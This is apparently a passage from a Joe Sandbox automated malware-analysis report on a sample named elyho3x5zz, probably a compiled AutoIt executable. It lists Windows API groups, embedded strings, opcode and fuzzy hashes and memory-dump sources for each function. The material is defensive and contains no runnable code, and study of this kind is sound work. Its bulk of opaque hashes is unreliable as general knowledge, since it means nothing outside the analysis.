      • API ID: ClassName$Window$Text$BuffCharRectUpperwcsstr
      • String ID: ThumbnailClass
      • API String ID: 4010642439-1241985126
      • Opcode ID: acf01bc4ef961a1ce9589b39a99d2e755b4ab7ba2c52c218cc1cf05932e79f2a
      • Instruction ID: b899ceecb29ae50e7f55c3170cd6a5c4bea0c7e97ed6e8a3f8e8c90f762efed9
      • Opcode Fuzzy Hash: acf01bc4ef961a1ce9589b39a99d2e755b4ab7ba2c52c218cc1cf05932e79f2a
      • Instruction Fuzzy Hash: 88A1E536B0865267FA28AB16D4066B9F761FBC5784F804071DA8E03A95DF3DF904EB10
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Icon$DestroyExtractImageLoadMessageSend
      • String ID: P
      • API String ID: 1268354404-3110715001
      • Opcode ID: 02435e4ac2fd25411414f443f70b9a64b2fb5eec06818f208819b822860aaaf9
      • Instruction ID: 8fff79eadb310ad5d3afad64ca924e0e32c19106340320aeb318d29d5be0657d
      • Opcode Fuzzy Hash: 02435e4ac2fd25411414f443f70b9a64b2fb5eec06818f208819b822860aaaf9
      • Instruction Fuzzy Hash: 2F61E73AA08641AAFB54EF26E842679B7A0FFC5B98F940571ED0E43794DF3CE440A710
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: LoadStringwprintf
      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
      • API String ID: 3297454147-2391861430
      • Opcode ID: dea33047e07f475fdf13a38a8a81df7e5fdcd2daba7d6f16993dc7bf36732046
      • Instruction ID: f537346cbedfa74e67e689b34e95671eea28ed5979c972f72d88619497c3f864
      • Opcode Fuzzy Hash: dea33047e07f475fdf13a38a8a81df7e5fdcd2daba7d6f16993dc7bf36732046
      • Instruction Fuzzy Hash: FD717F6AA18A52B6FB00FB61E4524F9E360FB84784FC010B2EA5D07699DE7CE506E750
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
      • API String ID: 3030280669-22481851
      • Opcode ID: bf652cffd062c394fe336ad674e489c783c88ee7871ac2fefe448d19d608bd28
      • Instruction ID: ae2c7129a3454c6bc2d0c632a6f4df4ee68a95752221c0c6b9f6f02409a048c5
      • Opcode Fuzzy Hash: bf652cffd062c394fe336ad674e489c783c88ee7871ac2fefe448d19d608bd28
      • Instruction Fuzzy Hash: B051B627B18A82A5FB10EB64F8851E9F7B0FB94394F800071EA4D47AA9DF3CD549E710
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Window$CreateMessageObjectSend$AttributesCompatibleDeleteDestroyLayeredLongMovePixelSelectStock
      • String ID: static
      • API String ID: 3821898125-2160076837
      • Opcode ID: 2ad0c9b06366bd18a744c10cd610a20c9196bc34b39a8e3022a1d8394ddcf546
      • Instruction ID: 38694b288ee5a7154eaa72a4d97ec5c4e0b9c3bc34aeb60ee69eadcb23d0420c
      • Opcode Fuzzy Hash: 2ad0c9b06366bd18a744c10cd610a20c9196bc34b39a8e3022a1d8394ddcf546
      • Instruction Fuzzy Hash: 6F419E366087819BF7209F25E445B5AB3A1FBC87A0F904275EA9D83B99CF3DD444EB10
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
      • String ID: :$\$\??\%s
      • API String ID: 3827137101-3457252023
      • Opcode ID: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
      • Instruction ID: ab50070b868cf79d7ec9ac9b4496323ce19f3d277f96198cd8cc358fba700feb
      • Opcode Fuzzy Hash: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
      • Instruction Fuzzy Hash: D941E4266186C395F720AF21E8116FDA3A0FFC5B98F841135DA0D47AA8DF7CC546E710
      APIs
        • Part of subcall function 00007FF73A1D6838: CreateFileW.KERNEL32 ref: 00007FF73A1D68A2
        • Part of subcall function 00007FF73A1F4380: GetCurrentDirectoryW.KERNEL32(?,00007FF73A1DE817), ref: 00007FF73A1F439C
        • Part of subcall function 00007FF73A1D56D4: GetFullPathNameW.KERNEL32(?,00007FF73A1D56C1,?,00007FF73A1D7A0C,?,?,?,00007FF73A1D109E), ref: 00007FF73A1D56FF
      • SetCurrentDirectoryW.KERNEL32 ref: 00007FF73A1DE8B0
      • SetCurrentDirectoryW.KERNEL32 ref: 00007FF73A1DE9FA
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
      • API String ID: 2207129308-1018226102
      • Opcode ID: 8eddc04ab28817822f4a93ed76fa85581b07abfed3b528ac44f53e81da1efb71
      • Instruction ID: a74cdd73b1bd3738caa59d946a53681f32a16eecaf00bda4784479a184aaee0d
      • Opcode Fuzzy Hash: 8eddc04ab28817822f4a93ed76fa85581b07abfed3b528ac44f53e81da1efb71
      • Instruction Fuzzy Hash: 5712A12AA18682A5FB60FB24E4421BDB770FB85794FC00172EA4E47A99DF7CD505E720
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Icmp$CleanupCloseCreateEchoFileHandleSendStartupgethostbynameinet_addr
      • String ID: 5$Ping
      • API String ID: 1486594354-1972892582
      • Opcode ID: 9226440d457761ba4f36db6d4fac0bac8b4cce99b63f227200959febed57b86d
      • Instruction ID: 6e850d59564b446820824e97f76d46c0713c7cbb5397055b897fb735d64be338
      • Opcode Fuzzy Hash: 9226440d457761ba4f36db6d4fac0bac8b4cce99b63f227200959febed57b86d
      • Instruction Fuzzy Hash: E0719E6AA0964296FB24EF15D48237DB760FFD4B90F868571EA0E473A1CFBCD540A720
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo
      • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
      • API String ID: 3215553584-2617248754
      • Opcode ID: e534a4a1f8a44b0f303199b2ab2fa91302a5b5a6dc95b4e8f2eb5eb0306d3d2b
      • Instruction ID: a08834c6b8e2dd228c769a78a49472d435d66af6b80d8751446fdda4616d5d7e
      • Opcode Fuzzy Hash: e534a4a1f8a44b0f303199b2ab2fa91302a5b5a6dc95b4e8f2eb5eb0306d3d2b
      • Instruction Fuzzy Hash: 7641CF3AA06B41A9FB10DF24E8427AD77A8EB48388F814675EE5C47B94DE3CD025E351
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: MessageSend$CtrlParent$ClassName
      • String ID: ComboBox$ListBox
      • API String ID: 2573188126-1403004172
      • Opcode ID: dfb27eded382d04c42ecc2cdc37d493d18a0521dff18e187c2c339d4b9f3cbe5
      • Instruction ID: 8a96cc32afaebae298ab6d00e8d90a45519fcd925dd5c4316ec081a39082df77
      • Opcode Fuzzy Hash: dfb27eded382d04c42ecc2cdc37d493d18a0521dff18e187c2c339d4b9f3cbe5
      • Instruction Fuzzy Hash: 44310839A08640A1FB10BB15E8161F9A360FFC9BE0F844271DEAD437D9DE2CD505E760
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: MessageSend$CtrlParent$ClassName
      • String ID: ComboBox$ListBox
      • API String ID: 2573188126-1403004172
      • Opcode ID: f1b4cfdd9199acace61e0bbbc7281290769df8079891c472fcd9c3ff8be8a576
      • Instruction ID: 45cd74b68bc1a8826245c6512d72cd76eb037c0abb806a6518cbc465e1a64707
      • Opcode Fuzzy Hash: f1b4cfdd9199acace61e0bbbc7281290769df8079891c472fcd9c3ff8be8a576
      • Instruction Fuzzy Hash: 1331E429A08B81A6FB10AB15E8561F9A360BFC9BE0F844170DE9D437D9DE2CD509E760
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: wcscpy$CleanupStartupgethostbynamegethostnameinet_ntoa
      • String ID: 0.0.0.0
      • API String ID: 2479661705-3771769585
      • Opcode ID: 281b95de85becf4cb0c172ae07bcd082ee5a72526fdd79f54f4593c1c2c2b1be
      • Instruction ID: 5bbc40b88accd6097f9427adf131535ce700839cfb13557e7b0cd0a7865dd285
      • Opcode Fuzzy Hash: 281b95de85becf4cb0c172ae07bcd082ee5a72526fdd79f54f4593c1c2c2b1be
      • Instruction Fuzzy Hash: D8218125A09983A1FA24BB15E4463BDA361BFD4BC0FC04171DA4D46AA5DE6CD544F320
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
      • String ID:
      • API String ID: 2672075419-0
      • Opcode ID: 7f60c88404643dc1ac8f4702e655552145117f454e5503c1890abb71af915063
      • Instruction ID: 1cee6e1c44255427b503f3ac0a11ab1ebd801e7d840167f6561ad4d680188538
      • Opcode Fuzzy Hash: 7f60c88404643dc1ac8f4702e655552145117f454e5503c1890abb71af915063
      • Instruction Fuzzy Hash: AC91843AB0965299F750EF61D4423BDB3A5FB84B88F904075EE0D83A99CE39E445F320
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
      • String ID:
      • API String ID: 2156557900-0
      • Opcode ID: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
      • Instruction ID: 04ea21895d9638b45b2b8a0da9c099bc623ef251d7859910fc819303795b3bc4
      • Opcode Fuzzy Hash: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
      • Instruction Fuzzy Hash: 28315029B0C612A6F750AB26E886639F3A1BFC4750FD04474DD4A83B54DE3DE845BA20
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID:
      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
      • API String ID: 0-1603158881
      • Opcode ID: 8d2a20e7415997667591ce402e351c43c5a03fc0fc3fcc6e8889e86afd0c7263
      • Instruction ID: 742ac7ef1323b2536d77071e966c4664acfa2a221ca0a3a4b51d44606a746933
      • Opcode Fuzzy Hash: 8d2a20e7415997667591ce402e351c43c5a03fc0fc3fcc6e8889e86afd0c7263
      • Instruction Fuzzy Hash: A012E66AF1964371FA58AB24E8072F9E2A1BF95B44FC44571CA1E4A2D0EF7DE540F320
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: MessageSend$Window$CreateObjectStockwcscat
      • String ID: -----$SysListView32
      • API String ID: 2361508679-3975388722
      • Opcode ID: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
      • Instruction ID: 4a0ac899ce5da24aaf0d8b00eb58d737c681eae0e7c2572791e5e3b06f869b05
      • Opcode Fuzzy Hash: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
      • Instruction Fuzzy Hash: 0F511336A047929AF720DF24E8456DD73A5FB88794F80013AEE4C47B59CF39D694EB40
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: ClassMessageNameParentSend_invalid_parameter_noinfo
      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
      • API String ID: 2019164449-3381328864
      • Opcode ID: 85bc50b5cb3f1aae72e6251db0d1ce00868677b2ce09b4091907517111ac15a9
      • Instruction ID: 2c33f81d619082b8ae58f798caa07bb084cd219a05b308ed4f74a0260d2832d4
      • Opcode Fuzzy Hash: 85bc50b5cb3f1aae72e6251db0d1ce00868677b2ce09b4091907517111ac15a9
      • Instruction Fuzzy Hash: 6D216F29F1C543A0FA50BB15E9462B9A3A0AFC1784F8481F6DE0D47295EE3DE51AB720
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
      • String ID:
      • API String ID: 3210457359-0
      • Opcode ID: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
      • Instruction ID: 216f38d83723950ade08404e87b60dd75eedb8f89e286cfb2ddacd54a4f03e76
      • Opcode Fuzzy Hash: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
      • Instruction Fuzzy Hash: 3461C42DA08543A6FB34BA35945B7BAA761BFC0794F9040B1EE1D436D6CE7EE540B320
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
      • String ID:
      • API String ID: 1957940570-0
      • Opcode ID: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
      • Instruction ID: 4c3ee45a9406ed66750a78b9fccbb511206f333e337292b15ca392aab4aae781
      • Opcode Fuzzy Hash: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
      • Instruction Fuzzy Hash: 8021593A919B8186E710DF42E44936AB7A4F789FDAF844165EE8D13B64CF7CD1489B00
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageReleaseScreenSendText
      • String ID: @GUI_DRAGFILE$@GUI_DROPID
      • API String ID: 3721556410-2107944366
      • Opcode ID: 70d47c5170b8672f03edd05a98c6d2966c5763d27284998555ab0e28016c2037
      • Instruction ID: 0743c62b404395c79339709784ad60d7f634a9314679b1ea7147c671924809e8
      • Opcode Fuzzy Hash: 70d47c5170b8672f03edd05a98c6d2966c5763d27284998555ab0e28016c2037
      • Instruction Fuzzy Hash: ED61C43AA18A52A9F700FF61E8825ED7774FB84B98F800172ED0D53AA9DF38D545E350
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
